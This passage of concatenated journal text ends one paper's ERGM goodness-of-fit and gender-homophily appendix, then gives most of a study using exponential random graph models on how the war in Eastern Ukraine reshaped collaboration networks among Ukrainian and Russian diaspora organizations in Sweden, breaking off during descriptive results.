(Wave 2), I used the following three commonly used structural features: degree distribution, geodesic distance, and edge-wise shared partners. Red lines show the frequency of the observed network, whereas the boxplot shows the distribution frequency of the simulated networks. Although almost all of the statistics are well replicated, in both waves, the degree distribution of the F2F network and distributions of edge-wise shared partners in the F2F and SNS network are not replicated very well. The simulated distributions are skewed to the right, compared to the observed network. 94 Gender Homophily in Multilayer Media Social Networks Figure A1: Goodness of fit of ERGM, comparing structural network statistics (Wave 1). However, the main interest of the present study is cross-gender connections. In Figure A3, comparisons of the E-I index between the observed network and the simulated networks are shown. Red dots show the value of the observed network, whereas the box plots show the distribution of 95 CONNECTIONS Figure A2: Goodness of fit of ERGM, comparing structural network statistics (Wave 2). the value of the simulated networks. As shown in Figure A3, the E-I index positions around the median value of simulated networks in every layer and wave, which means that the models can replicate the mixing of gender in the classroom very well. 96 Gender Homophily in Multilayer Media Social Networks Figure A3: Goodness of fit of ERGM, comparing E-I index (Wave 1 and 2). Appendix B I also estimated homophily parameters separately for each gender by ERGMs. The results are shown in Figure B1. Here, the network statistics of (fe)male-(fe) male is defined as the number of edges in which both dyads are (fe)males. In this model, the strength of gender homophily is assumed to be different for each gender. Independent variables other than gender homophily are the same as those in the manuscript, however, they are not shown. Although estimated coefficients are not significantly different between male and female, there are some findings from their estimated values. First, in both waves, female–female ties are less likely to form than male–male ties in the SNS layer. Second, female–female ties in the IM layer become less homophilous in the Wave 2 data. Third, in the Wave 2 data, male–male homophily became weaker in the F2F layer, whereas female–female homophily are still as strong as the Wave 1 data. 97 CONNECTIONS Figure B1: Gender homophily parameters estimated separately for male and female by ERGM (Horizontal bars are 95% CIs). work_hyou7qucmvhrbei6quydbibfdq ---- 1 Article | DOI: 10.21307/connections-2019-008 CONNECTIONS Ukrainian and Russian organizations in Sweden and the conflict back home Sofiya Voytiv Stockholm University, Sweden. E-mail: sofiya.voytiv@sociology. su.se Abstract This paper investigates whether the Maidan Revolution in Kyiv (late 2013–early 2014) and the ongoing armed conflict in Eastern Ukraine (early 2014) have been reflected in the collaboration networks of Ukrainian and Russian organizations in Sweden between 2013 and 2016. I use ERG models to account for the probabilities of ties between the organizations, depending on the network structure and individual attributes such as ethnic identification and the choice of a side to support in the conflict. Results suggest that it is support for a certain side in the conflict, and not ethnic self-identification, which drives the clustering of the networks during the most violent period. Keywords Ethnic organizations, Collaboration networks, ERGM, Foci of activity, Armed conflict. In order to increase their influence and achieve certain other goals, most organizations tend to collaborate with other organizations that they believe share their perspectives and attitudes (Portes et al., 2008). Ethnic organizations mostly base their activities on perceptions of common “routes” and “roots” and tend to collaborate with similar others, and thus have a quite homophilous collaboration network. However, when a violent armed conflict in the homeland arises, it can be brought closer to the everyday space of diaspora through modern media and globalization processes (Baser, 2015; Brubaker, 2005; Féron, 2017; Féron and Lefort, 2019; Jabri, 2007; Oberschall, 2000). For example, the development of modern media has allowed a lot of war and conflict-related events to be available and witness-able across the geographical spaces simultaneously (Ukrainian Revolution at the end of 2013 – beginning of 2014 has been streamed by multiple channels online; Mosul battle streamed online via Facebook, and others). A lot of ethnic/diasporic organizations in this context may mobilize their activism in order to show their support for or discontent with the events, especially if they perceive themselves as a group under attack (Oberschall, 2000). For example, Féron (2017; Féron and Lefort, 2019) discusses the case of conflict-generated diasporas that emerge as a direct response to the armed conflict in the home country. In addition, Baser (2005) looks more closely at the realities of Turks and Kurds living in Germany and Sweden and compares their experiences, which lead to different outcomes for the relationships between the two groups in these specific contexts. Other research on the interconnection of war in the homeland and diasporas include multiple case studies such as Palestinian, Irish, Armenian, Tamil, Rwandan Tutsi diasporas as well as studies of intergroup relations in the country of settlement, e.g., Sikh–Muslim relations in Britain (Féron, 2017; Koinova, 2016; Moliner, 2007; and others). However, this type of research is still quite scarce, while most of the diaspora studies focus mostly on the ways in which diasporas can affect the peace-building processes in their home countries, as well as the political unrest © 2019 Author. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). Issue 1 | Vol. 39 2 Ukrainian and Russian organizations in Sweden and the conflict back home that they can be a part of in the country of settlement (Demmers, 2002; Féron, 2017). Nevertheless, all this research, among others, show that an ongoing armed conflict in the home country can have the potential to affect the collaboration networks, which different ethnic organizations build with each other. Thus, shared ethnicity can lose its importance in how an organization decides to form a connection with another, and shared attitudes about the conflict can become a leading mechanism in forming collaborations. In other words, an ethnically homophilous collaboration network may reorient itself into clustering by attitudes toward the conflict, and thus actively choose to become homophilious based on that perceived value. An organization can, therefore, give a lesser degree of consideration to collaborate with another one solely on the basis of that organization’s claim of ethnic belonging, and choose the collaborations based on the perceived agreement on the politics in the home country. Alternatively, there might be a reconfiguration of the meaning of ethnic belonging, namely the attitudes toward the conflict may become a substantial part of identifying the potential collaborator as a “true” co-ethnic or not, and thus leading to the action of working together or rejection of any association. In this paper, I focus on the collaboration networks of Ukrainian, Russian, and Russian-speakers’ organizations in Sweden to see the effects that their identified ethnicity and stand toward the conflict may have had on their structure. I account for the Swedish context and trace the evolution of the network, including its growth through the creation of the conflict-generated organizations, i.e., organizations that both through their name and activity description claim the war in Eastern Ukraine to be their main focus, agenda, and reason for existence. I do not claim to see the causal relationship or to distinguish the exact impact of the war on the collaboration networks since I specifically focus on the 2014 through 2016 period that saw the beginning of war in Eastern Ukraine and was the most violent period in terms of casualties. However, I suggest that there are some indications that the reflections of war have at least been present in the studied collaboration networks and thus had a significant enough impact, especially in the Ukrainian organizations’ case. Focusing on this conflict is particularly interesting since it allows us to follow its development from the early stages onwards, as well as follow the changes in the diasporic communities, in the context of the relatively high freedom of organization that Sweden provides. I suggest that the concept of homophily is useful to understand ethnic organizations’ collaboration before the armed conflict in Eastern Ukraine started, but the model of foci of activity is more applicable for the analysis of collaborations based on their attitudes toward the armed conflict. I suggest that engaging in activities that (do not) support a certain side in the conflict might have become a focus of activity for the organizations and reorganized the organizational field along the conflict lines that later became incorporated into the identification of the other organization’s ethnic belonging. Thus, ethnicity in terms of similar ideas on one’s “roots and routes” may become less steering for the collaboration decisions than identification with a certain side in the conflict. The context of the study Short background on the armed conflict in Eastern Ukraine The current armed conflict in Eastern Ukraine can be traced back to the beginning of the Maidan Revolution in November 2013 when the protests against then President Yanukovych and the Parliament of Ukraine became large scale due to the President’s sudden decision not to sign a trade pact with the European Union. By late February 2014, there were more than a 100 unarmed protesters that were killed, after which then President Yanukovych fled the country and a new Parliament was established (UN Documents for Ukraine). In March 2014, the Russian Federation annexed the Crimean peninsula, an autonomous region within Ukraine, claiming its ethnic belonging as Russian and the “necessity of defending the Russians in Crimea” (address by President of the Russian Federation Vladimir Putin). Soon thereafter, Russian- backed rebels started an insurgency in two eastern regions of Ukraine: Luhansk and Donetsk (The World Bank: Conflict in Ukraine, 2017; OSCE statements). The most violent period of the conflict occurred in 2014 and 2015. July 2014 also saw the downing of the MH17 flight by Russian-backed insurgents in Eastern Ukraine (Crash MH17, 2014). The World Bank Organization estimates that over 4 million people in Eastern Ukraine, specifically the Donbas region, have been directly affected by the continuing conflict (The World Bank: Conflict in Ukraine, 2017). According to a 2015 OCHA report, the number of casualties due to the conflict was 30,729, with 21,396 wounded and 9,333 killed (OCHA, 2015). By 2016, the number of those killed reached more than 10,000 (The World Bank: Conflict in Ukraine, 2017; UN Documents for Ukraine). In addition to casualties, 2.7 million people have been displaced. At the time of this writing, the official ceasefire has often been 3 CONNECTIONS violated, and recent developments in the Ukrainian– Russian relations (Russia seizing three naval ships in the Azov sea in late November 2018) point to a new phase of the crisis (UN Emergency Security Council Meeting on Seized Ukrainian Vessels). Swedish context: response to the conflict in Eastern Ukraine and Ukrainians and Russians in Sweden Sweden is a country with a high level of participation in civil society, with an astonishing number of 251,000 “civil society” organizations, out of which 156,845 are non-profit (Statistikmyndigheten SCB). It is relatively easy to register an organization if it is non-profit, including even applying for funding through the state. Sweden is quite welcoming to different types of non-violent, non-terrorist, ethnic activism, which creates good grounds for practicing one’s ethnicity and taking part in homeland politics through demonstrations and other similar activities (Baser, 2015). In the context of the Ukrainian–Russian conflict, Sweden has been very supportive of Ukraine. One example is the multiple visits by the Swedish foreign affairs ex-ministers Carl Bildt (March, 2014) and Margot Wallström in 2017. In addition, Sweden has been offering humanitarian, financial, technical, and even police training aid to Ukraine since the war unraveled, through organizations such as Sida and Riksbanken (The National Bank of Sweden) (Sveriges Riksbank and Sida: Ukraine). Moreover, within its Regional Strategy for Cooperation with Eastern Europe, launched in November 2014, Ukraine is the biggest recipient (European External Action Service – European Commission). In 2018, there were 21,930 people born in the Russian Federation and 9,924 born in Ukraine living in Sweden (Statistikmyndigheten SCB). According to the Swedish Migration Office, of the people seeking asylum from Ukraine during the years of the conflict, only 32 applicants were approved in 2014 and just 29 in 2015 (Migrationsverket, 2017). Thus, it can be assumed that the Ukrainian population living in Sweden has not been significantly affected by migration due to the armed conflict in Eastern Ukraine. However, the economic and political situation of Ukraine has no doubt influenced the decision-making process of emigration from the country. The history of Ukrainian and Russian populations’ settlements in Sweden is, to a great extent, speculative and mixed. Throughout the Soviet Union period, most people coming from any republic within the Union would often be counted either as Soviet or Russian. Therefore, it is not easy to describe a clear and distinct history of every population. However, some knowledge has been passed on, both through the official governmental institutions, organizations, and individual people. The information below is based on interviews with the representatives of different Russian, Russian-speaking and Ukrainian organizations, Russian and Ukrainian embassies, and Swedish Statistical Bureau. When it comes to Ukrainians in Sweden throughout the twentieth century, one of the first bigger waves came as prisoners of the 1939 to 1940 Winter War between Finland and the Soviet Union as well as more coming during the later years of the Second World War. By the mid-1950s, the community had managed to create some organizations (Embassy of Ukraine in Sweden). Another wave of immigration to Sweden came with the collapse of the Soviet Union, and included mostly women. Thus, by 2000, there were 441 men and 1,018 women born in Ukraine living in Sweden (Statistikmyndigheten SCB). This statistics, however, has to be viewed with caution since the registration by country of birth might have been mixed up with accounts of registering Soviet Union and not a particular Soviet republic before the late Soviet Union collapse. The first big wave of emigration from Russia in the twentieth century came with the First World War and the 1917 Revolution, following thereafter with emigration caused by the Second World War and finally, following the break-up of the Soviet Union. In the early 1990s, the Russian population in Sweden consisted mostly of women (Embassy of the Russian Federation in the Kingdom of Sweden). Thus, by 2000, there were 2,192 men and almost twice as much (4,331) women born in Russia living in Sweden (Statistikmyndigheten SCB). Ukrainian and Russian organizations in Sweden also have interconnected, yet, distinct histories of existence in Sweden (most of this information is obtained from the interviews with representatives from the Ukrainian and Russian ethnic organizations). Many of these organizations were created before or after the Second World War, and some changed from the so-called Soviet “friendship” to independent nation-state-specific organizations. Most of them claim a very long history of existence even before they were (or formally could be) registered. Practicing activism based on cultural issues is rarely problematic in Sweden, and organizations that mostly focus on maintaining traditions and celebrations from the home country can easily apply 4 Ukrainian and Russian organizations in Sweden and the conflict back home for funding from the state to organize such activities. On the other hand, to be a completely politically focused organization or one primarily occupied with humanitarian or other aid can be limiting, in terms of funding from the Swedish state and require stronger argumentation. This is even more complex for openly political organizations (Lagar för ideell förening – Bolagsverket). Therefore, many organizations may find it easier not to register with the state, although they do exist and organize meetings and events for their members. Most of these organizations use online social media platforms, where they can freely converse and diverge from mainstream ideas and thoughts. All in all, the Swedish context is one with a relatively high freedom of organizational engagement and expression, which makes it quite easy for the diasporic communities to organize and push their agenda, often relating to raising awareness about their homeland or their situation in the country of settlement. Therefore, studying the collaboration networks in this context is not limited by the legal or oppressive regime structures in which similar practices cannot take place. Here, it is also important to note that diaspora organizations, although often claiming to represent the totality of the group rarely do so (Ragazzi, 2012). Most often, diaspora groups are comprised of people who have a very special connection to the idea of “homeland” and stronger ethnic identification than their average co-ethnic. Thus, this research cannot be generalized to the total populations of either Ukrainians or Russians in Sweden, but only to very specific diasporic organizations with a strong and institutionalized sense of ethnic belonging. In addition, the research opens an important arena for studies on inter-ethnic and diasporic relations in the times of war in the home country. Homophily The idea behind the concept of homophily is often summarized by a saying “birds of a feather flock together,” famously applied by McPherson et al. (2001) and relates to the phenomenon that people tend to become friends with people who share some similar characteristics with them. Homophily is an ambivalent process that makes the flow of information faster for similar others, while at the same time implies that this flow of information is localized and not different from whatever the similar others already share (McPherson et al., 2001). McPherson and Smith-Lovin (1987) distinguished between choice homophily and induced homophily. In their discussions, induced homophily covers the effect of group composition that is homogenous on the individual pairings with similar others. Similarly, Blau (1977) proposed that patterns of relationships including homophily are guided by relative group size and ability to gain contacts for in- and out- group. In other words, the opportunity structure within the homogeneous group/organization that a pair is in dictates that the pair is also homogenous. Thus, in this view, baseline homophily reflects the composition at large and is affected by the relative size and pool of potential contacts. On the other hand, choice homophily is an individual bias or propensity to connect with similar others (Coleman, 1958; McPherson and Smith-Lovin, 1987; Marsden, 1988). In other words, the composition at large has no effect on the homophily patterns in the group. Multiple studies have pointed to how homophily can be stronger or weaker for different types of ties as well as different socio-demographic or behavioral/attitudinal categories within the given context. When it comes to socio-demographic categories, such as sex, gender, age, or ethnicity, studies have been variable. In the case of gender, homophily is especially interesting since the group sizes at large are almost equal. The fact that gender homophily is strongly present in different societies and groups showcases that there is an individual or structural bias, since the organizational foci are gendered, as are workplaces and other activities (McPherson and Smith-Lovin, 1987; Eder and Hallinan, 1978). Marsden (1987) after controlling for kin showed that network composition of people with whom others discuss important matters is strongly gendered. Further, Ibarra (1992) found that men have stronger sex homophilous ties than women. Moreover, women with homophilous ties received support from other women and instrumental access through network ties to men, in her study of an advertising firm (Ibarra, 1992). When it comes to age, homophily patterns depend on the type of ties studied (McPherson and Smith-Lovin, 1987). In addition, since school classes are grouped by age, a strong baseline age homophily is induced (McPherson et al., 2001). Age homophily has also been shown to persist longer, most probably due to friendships formed at a younger age (McPherson et al., 2001; Marsden, 1987, 1988). Homophily and ethnicity Homophily based on ethnicity is a special case and has been explained by both contact opportunities (group size) and biases. Studies have shown that 5 CONNECTIONS smaller ethnicized and racialized groups share more networks with majority groups (Blau, 1977; Marsden, 1988; McPherson et al., 2001). On the other hand, other studies (Marsden, 1987, among others) have shown that this pattern may be different for certain groups, where a smaller group shows a tendency for homophily despite the baseline expectation that smaller ethnic groups’ networks should include more majority group members. One explanation that these studies give for this anti-intuitive pattern is that some organizational foci are segregated by ethnicity and thus limit opportunities and create bias. Often, these overlap with social class and status. In the case of ethnic organizations, the process of defining ethnic belonging and cultural heritage becomes central and practical. These organizations are voluntary, and historically people have joined them in order to gain access to information networks and for work opportunities, among other things (Portes et al., 2008). Portes et al. (2008) write that in order to play a role in the nation- state politics on minorities, people often organize in a formal, stronger, way to exercise more power. Similarly, Ooka and Wellman (2006) in their study on ethnic groups in Toronto showed that newly arrived migrants tend to have more homophilous networks that can be explained by both ethnic segregation (of neighborhoods, voluntary organizations, language, schools, etc.) and hidden value homophily, like tastes and information. In the context of ethnic organizations, ethnicity is constantly made and maintained through various organized events and similar activities. Scott Feld’s (1981) foci of activity model is both complementary and explanatory for the analysis. Feld suggests a theory of focused social ties based on the idea that social networks are organized through shared focus and joint activity. He states that individuals often have little choice in their association with certain foci. While some activities can be chosen by individuals who then create social networks around them (e.g., playing tennis), social foci can be better understood as social structures that systematically constrain the choices of relationship formations (e.g., only certain people play or want to play tennis). Thus, people who are tied to each other through their relations to these focal activities also tend to be homogenous in other characteristics. Feld derives three propositions from his model. First, since we meet to associate, most relationships originate in focused activities. Second, these foci are usually homogeneous. Third, if foci are homogeneous, the ties that are created there also tend to be homogeneous (McPherson and Smith-Lovin, 1987; McPherson et al., 2001). The main basis of identification in ethnic organizations is (obviously) ethnicity, and since almost every organization’s activities evolve around the cultural heritage of the group they represent, it makes little sense for them to be heterogeneous in terms of collaborations with other ethnic organizations. Thus, unless two organizations share some similarities in their views on their “roots,” culture, or heritage, theoretically they should not have many reasons to collaborate. These similarities mostly relate to views on ethnicity and, in the case of Russian, Ukrainian, and Russian-speaking organizations, showcase a complex and specific ethnic boundary- making process. One example is Russian-speaking organizations, which can include people from almost every ex-Soviet country. Inclusion of different cultural and religious holidays in such organizations forms a pan- (often Slavic)-ethnicity that connects all the specificities. In the case of Ukrainian and Russian organizations, the question of “similarity” of traditions and culture in general has been a loaded political topic, especially during the last several years when the war unraveled. The boundary between Ukrainian and Russian identifications has shifted continuously and is usually drawn on language spoken and/or country of origin. In the case of ethnic organizations, where each represents a group of people that are homogenous, at least in terms of how they self-identify through ethnicity (as someone representing a certain culture through membership in an organization), the focus of activity is usually traditions from the “homeland,” such as dancing or celebrating religious holidays, and relates to an already established sense of ethnic belonging (see discussion of homophily). However, when the war in the homeland starts abruptly, mobilization of the sense of ethnic belonging may lead to reinventing different activities and renegotiating collaborations on the basis of the attitude toward the ongoing war. Ethnic organizations – due to their already strong connection to the idea of homeland (Jabri, 2007; Demmers, 2002; Vertovec, 1999) – may regard taking a stand as a necessary point of activity in relation to their identification with certain ethnicity. However, if it is relatively easy to assign ethnicity to an organization through the already existing name, for example, the attitude toward the war could become a more complex process that is also related to maintaining the established ethnic identification. This may require more work, and organizations might feel the pressure to become active in support of or discontent with the ongoing situation at home. Thus, the focus of their activities may shift, from primarily ethnicity-maintaining cultural events like celebrating shared perspectives on the history and traditions to relating primarily to the developments of the political situation currently ongoing at home. 6 Ukrainian and Russian organizations in Sweden and the conflict back home Reorganizing the meanings of ethnicity through the focus of activity Studies of ethnicity and inter-ethnic relationships usually tend to understand ethnicity as a characteristic at the core identity (Chow and Bowman, 2010). I believe taking the model of focused social ties (Feld, 1981) discussed above grants the possibility of studying ethnicity without these essentialist assumptions. It creates a theoretical possibility for understanding ethnicity and diasporic communities through action as constructed through maintenance of ethnic boundaries (Wimmer, 2008). In the current study, I suggest that collaboration of ethnic organizations is often based on the perceptions of shared “routes” and heritage. However, in times of war in the homeland, a reorientation might take place, usually through activities such as demonstrations and different campaigns connected to the developments “back home.” In this way, the war in the homeland can become symbolically transported into the everyday of the diasporic organizations and thus become a focus of activity too. Often, in order to raise an awareness about the developments in the homeland, the best way for these organizations would be to gather as many people as they can. Hence, organize the similar others around them through activities related to the conflict that is happening thousands of miles away. At the same time, those who previously were non-political or even active at all might become mobilized to action as well. Therefore, the restructuring of the organizational field by the conflict attitudes might take place. Put in other words, if the war in the homeland has no implication for the collaboration networks, they would probably be characterized either by same ethnicity pairs, or not dominated by ethnic identifi- cation at all (only structural network characteristics would matter for the collaborations in this specific case, such as, e.g., large and famous organizations would be more likely to receive invitations to collabo- rate). On the other hand, if collaborations tend to be dominated by pairs that share a similar attitude to- ward the conflict, this could be a potential indicator that the war in the homeland has had a shaping role in the evolution of the collaboration networks. Hypotheses In this section, I aim to clarify three main hypotheses that follow from the theoretical discussion above: H1. There is some collaboration between Ukrainian, Russian, and Russian-speakers’ organizations during the period studied. The collaborations are not dominated by organization pairs with the same ethnicity. This hypothesis suggests that there is some collaboration between Ukrainian, Russian, and Russian-speakers’ organizations due to shared religion or traditions as well as, in some cases, a common spoken language. H2. During the 2014 to 2016 period, Ukrainian organizations tended to collaborate with other Ukrainian organizations, and Russian organizations with other Russian organizations. Organizations might have collaborated with each other along the homogenous narrative of a shared past and/ or language, similar ideas on common “roots,” etc., only within clear ethnic boundaries. This hypothesis refers to the possibility that during the Revolution and subsequent war, this line of organizational collaboration remained the same. This scenario would showcase that while ethnicity is the main focus of the organizations, the developments in Ukraine were not reflected in the processes of network clustering. H3. Organizations that share attitudes relating to the conflict tend to collaborate more with each other than with organizations with other attitudes during the period studied. In this scenario, organizational field of collaboration networks have reoriented from primarily subjectively identified ethnicity to standpoints on the armed conflict in Eastern Ukraine. Thus, the third hypothesis suggests that the armed conflict in Eastern Ukraine can be regarded as a focus of activity for Russian and Ukrainian organizations in Sweden (see Fig. 1). Data collection The organizations researched in this study do not officially help with accommodation, work, or legal issues for the newly arrived migrants. The organizations that were created in the earliest period of critical developments in Ukraine (late 2013–2014) were concerned with the protests, assessing them either positively and showing support or negatively and treating the revolution as a coup – in the latter case often connecting it to Western political power struggles and conspiracies, 7 CONNECTIONS or nationalist organizations active in Ukraine. Later, with the beginning of the armed conflict in Eastern Ukraine, a few organizations were created to send humanitarian help, among other activities, and some were created to spread information about the political developments in Ukraine. Organizational network data collection started in early 2017. The network data were collected retrospectively through interviews and from official Facebook pages and websites of different Russian, Russian-speaking, and Ukrainian organizations. The main sampling method was to trace each organization from the connections of the previous one until the referrals led to the same organizations that were already in the database. The criteria for actors to appear in the network were: (i) the organization is Russian, Ukrainian, Russian/Ukrainian-speaking or active in connection with the conflict in Eastern Ukraine and (ii) the organization is based in Sweden. Actors could not be a political party or a governmental agency. Some organizations based outside of Sweden were included in the data collection but are not included in the data set for this analysis. The edges in the studied networks are all positive referrals and no negative (e.g. if organization A states that they will never collaborate with organization B, they have been excluded). Since the referral tracing data collection method was employed, some specific issues about the network boundaries should be mentioned. The first criteria for appearing in the network included organizations that are somehow active in connection with the conflict in Eastern Ukraine. Some of such organizations were generated by the conflict in Eastern Ukraine, while others have a broader set of activities and included in their agenda only a few events and collaborations that had to do with the conflict in Eastern Ukraine. In the first case, the conflict-generated organizations have been included as an edge sender and receiver node. In the latter case, the organization was coded only as an edge receiver. This was done to limit the network to only those organizations that are primarily focused on the conflict or identify themselves as Russian, Russian-speaking, or Ukrainian, while including potential collaborations with organizations that have a broader set of activities and agenda overall. The main motivation for including those organizations only as edge receivers was also to account for the theoretical possibility that the antagonist organizations could be connected through these broader organizations. Therefore, if not included at all, the network structure could be seriously implicated. The cumulative data for the period from 2013 to 2016 included 352 edges between 86 different organizations. However, for this analysis, the final data set consisted of 59 organizations located in Sweden (including international ones with a chapter in Sweden) during the period 2014 to 2016. Table 1 shows that there are 14 Ukrainian organizations and 6 Russian organizations that clearly identify as such. The category “mixed” includes organizations that have members that identify themselves as Russian, Ukrainian, or other countries that used to be part of the Soviet Union or are Russian-speaking. Some of these organizations also identify themselves as Slavic. The fact that there are more specifically Ukrainian organizations reflects the phenomenon described elsewhere (author’s other unpublished article), qualitatively, namely that the people who were not happy with the claims of neutrality of the pan-Slavic organizations could demand a clear standpoint and even leave the organization if that demand was not satisfied. Some of these people could also start their own organization. On the other hand, if an organization became more political during the war, some members might not have felt completely happy with such course of events, and leave the organization as well. Furthermore, many organizations in the data set have been created as a direct response to the conflict, while claiming no identification with a specific ethnicity. It is important to also note here that since it has been possible to identify with a certain conflict side only after the conflict started, some of the already existing organizations had to choose whether they wanted to be neutral or not. Six out of the eight pro- Russian organizations have been created directly to acknowledge their attitudes toward the conflict. This is visible through the names of these organizations as well as their open declarations. Out of all the Figure 1: Focus of the conflict for diasporic organizations in another country, a model. a h g no m l f i j k c e d b pro-side A pro-side B neutral space 8 Ukrainian and Russian organizations in Sweden and the conflict back home pro-Ukrainian organizations, only two were created during 2014 and started by organizing demonstrations to raise awareness about political developments in Ukraine during the month of the Maidan Revolution. The rest were pre-existing organizations that declared their support for the Ukrainian Revolution. An interesting case is portrayed by the fact that out of four explicitly Russian organizations, only one claims to politically align with the pro-Russian side in the conflict. However, out of the 14 Ukrainian organizations – 10 are also pro-Ukrainian. Another interesting case is that of organizations that do not claim any ethnic identification (although in most cases these are predominantly Russian-speaking) but have been created to support the pro-Russian side of the conflict. Taking these issues into account, and the fact that out of the 59 organizations analyzed in the current research, eight organizations were created with an aim directly connected to the current Ukrainian–Russian conflict, it can be suggested that the collaboration networks have also been changing according to the developments in Ukraine. To analyze the networks, I use exponential random graph models (ERGMs) as they provide a method for modeling the probability of tie formation simultaneously for both the node attributes, such as ethnicity or type of organization, and the structural network statistics, such as triadic relationships or reciprocity between the organizations. One of the most important features of the ERGMs is that they assume network self-organization, in other words, tie dependence on each other. In comparison to other methods used in social sciences that assume independence of the individual subjects of one another, ERGMs give a more intuitive conceptualization of social networks as based on interconnectedness of actors in them. ERGMs also allow a lot of freedom for the researcher, by allowing multiple parameters to account for in the model, both concerning summary network statistics but also actor attributes (Lusher et al., 2013). In addition, ERGMs have often been used for the analysis of organizational collaboration networks (Fischer and Jasny, 2017). As for limitations, ERGMs require a complete network to perform well (Lusher et al., 2013). To the best of the author’s knowledge, all Ukrainian, Russian, Russian-speaking, or conflict-generated organizations active in Sweden from 2013 to 2016 have been included in the data set. However, the issues of network boundaries and inclusion criteria, as discussed above, might potentially have some implications for the parameters’ estimation of the ERGMs. In addition, since ERGMs are relatively new, in terms of development of the software, and are computationally intensive, they often lack convergence. Therefore, it is not always possible to compute every model, especially in the case of large networks (Lusher et al., 2013). Data variables and measures The attribute data for the nodes include information such as: type of organization (independent, umbrella, multinational), side taken by the organization in the conflict (pro-Russian, pro-Ukrainian, neutral/no explicit statement), and “ethnicity” of the organization (Ukrainian, Russian, mixed Russians and Ukrainians, other ethnicity, no connection to any ethnicity/ nationality). The two attributes of most interest for the current paper are organizational “ethnicity” and organizational choice of sides in the conflict. I treat Table 1. Data frequencies. Conflict side Ethnicity Neutral Pro-Russian Pro-Ukrainian Total Mixed (Russian-speaking) 8 1 0 9 Not national 12 6 1 19 Other national organizations 11 0 0 11 Russian 5 1 0 6 Ukrainian 4 0 10 14 Total 40 8 11 59 9 CONNECTIONS pro-Russian, pro-Ukrainian, or neutral as the three least complex attitudes toward the armed conflict in Eastern Ukraine that can be distinguished. By pro- Russian attitude, I mean following the official position of the Russian Federation Government on both the Maidan Revolution and the ongoing war. This means that organizations sharing this attitude believe that the Maidan Revolution was a coup, and that there has been a threat to the Russian population in Eastern Ukraine, which justifies Russian troops in the region, while also supporting the annexation of the Crimean Peninsula (OSCE Russian delegation statement, 2018; Address by the President of the Russian Federation from March 2014, retrieved March 2019). By pro-Ukrainian attitude, I mean following the official position of the Ukrainian Government that condemns the annexation of the Crimean Peninsula, does not believe there was a threat to the Russian population in Eastern Ukraine after the Maidan Revolution, and sees the revolution as getting rid of the corrupt government serving under the V. Yanukovych presidency (Ukraine Ministry of Foreign Affairs, 2019). By neutral attitude, I mean that either an organization explicitly stated its neutrality in the matters of the conflict or they never had any event, post, or statement about any of these events on their official web pages. Model specifications ERGMs are not suitable for the 2013 data set because it only dates back to September, and thus has a very limited amount of both nodes and edges. However, that year was not yet marked by war or numerous deaths during the protests. The most active period, as discussed in the previous sections, was between the years 2014 and 2015 and which settled down by 2016, at least in comparison to the previous years (Uppsala Conflict Data Program). Therefore, the analysis here will only concern the period from 2014 to 2016. All the models include the term “edges,” which serves as an intercept in the ERGMs and is a baseline probability of the tie formation (Lusher et al., 2013, p. 175). All the models start with the same baseline model, which includes network statistics such as measures of reciprocity and (in) transitivity as well as geometrically weighted in- and out-degrees, which are more stable terms for controlling for degrees. They work by imposing a specific rate of decay by degree to control for the nodes with a higher degree to contribute less than those with lower degrees (capturing popularity and activity spread) (Lusher et al., 2013, p. 9; Morris et al., 2008). Every model also includes the term “intransitive,” which controls for the effects of triplets of type 111D, 201, 111U, 021C, or 030C (as per Davis and Leinhardt’s, 1972 typology) and thus relates to clustering of the networks. This term is useful for the observed data since, as will become evident later in the descriptive analysis of the networks, most cases are characterized with low transitivity indices. In sum, together with reciprocity, the intransitivity term controls for effects of connectivity of the triplets. This specification helps for model convergence and fit since it “powers” the geometrically weighted terms. As for the node attributes that are covariates in the baseline models, these include type of organization, “ethnicity,” and the conflict side. Since some of the organizations are umbrella organizations or relatively bigger in size and fame than others, this measure captures the size of the node and thus also its attractiveness and popularity to a certain degree. The second step adds a homophily term to test whether organizations that support a certain side of the conflict tend to form ties with other organizations that have exactly the same view on the conflict. Unfortunately, only for the 2015 models was it also possible to check the tendency of pro-Ukrainian organizations to specifically connect to other pro- Ukrainian organizations, and pro-Russian ones to other pro-Russian ones (the model could converge with this particular specification of the term, while all the other models for the other networks lacked convergence). Finally, the third step adds a homophily term on “ethnicity” of the organizations and tests whether organizations that identify with a certain ethnicity tend to form ties with organizations with the same identification. As will be shown with descriptive results, especially for Ukrainian organizations, since there may be little heterogeneity on the standpoint toward the conflict and ethnicity, I performed multicollinearity checks for all the models that have both ethnic identification and conflict side parameters, by running them together and separately and comparing the results. If the results were different, then the full model included both “ethnicity” and “conflict side.” If they were not different, then the best fitted model is shown. To assess the fit of the models, I use the AIC (the smaller the better) estimate and the goodness-of- fit plots of the models given by the “Statnet:ergm” package in R software. The goodness of fit of the model is judged by the fit of degree distributions. I use p-values to assess the significance of the model parameters. Many argue that the p-value has a 10 Ukrainian and Russian organizations in Sweden and the conflict back home meaning only in relation to what it could mean in the data and to the external context of the analysis, thus having a strict approach and regarding a parameter as significant only up to 0.05 level can be unnecessary and limiting. In addition, even though the ERGM Statnet package uses p-values, the ERGMs use Monte Carlo maximum likelihood estimation, for which taking confidence intervals as significance estimators makes more sense (Lusher et al., 2013). Therefore, I regard a parameter in the model as significant if the p-value has a value of up to 0.1 (at four levels). Results Descriptive and univariate network analysis The period from 2013 to 2016 can be characterized by the growth of both the number of organizations and the amount of interorganizational connections for reasons discussed in the previous sections. The Figure 2: Network plots for the years of 2013 to 2016 (from left to right, row-wise). four networks are completely different in structure, size, and also the frequency of interactions or the number of edges (Table 1 and Fig. 2). Moreover, new nodes appear in the network throughout the different years; hence, they should be analyzed separately (Table 2). There is little transitivity between the nodes during 2013 and 2014. In 2015, the transitivity index suggests that some sort of clustering was taking place. Similarly, the network plots (Fig. 2) seem to further indicate some clustering along the ethnicity lines, especially for the years 2015 and 2016. If we take a closer look at the network plots for all the years (Fig. 2), in all of which the size of the node is based on the node degree, the above network properties also seem to have a strong relation with the node attributes (in Fig. 2, the nodal ethnicity attributes are shown in color). In addition to the descriptive properties discussed above, the plots hint on the clustering along ethnicity lines, which is stronger starting from year 2014 in the data set. 11 CONNECTIONS Figure 3: Cross-tabulation correspondence map between categories “ethnicity” and “side of the conflict” in the data set. Table 2. Descriptive network statistics. Network size Density Edges (total) Reciprocity Transitivity 2013 15 0.06 12 0.88 0 2014 15 0.10 22 0.88 0 2015 27 0.12 88 0.90 0.43 2016 40 0.08 139 0.94 0.19 Figure 3 shows further that most of the Ukrainian organizations in the data set are on the 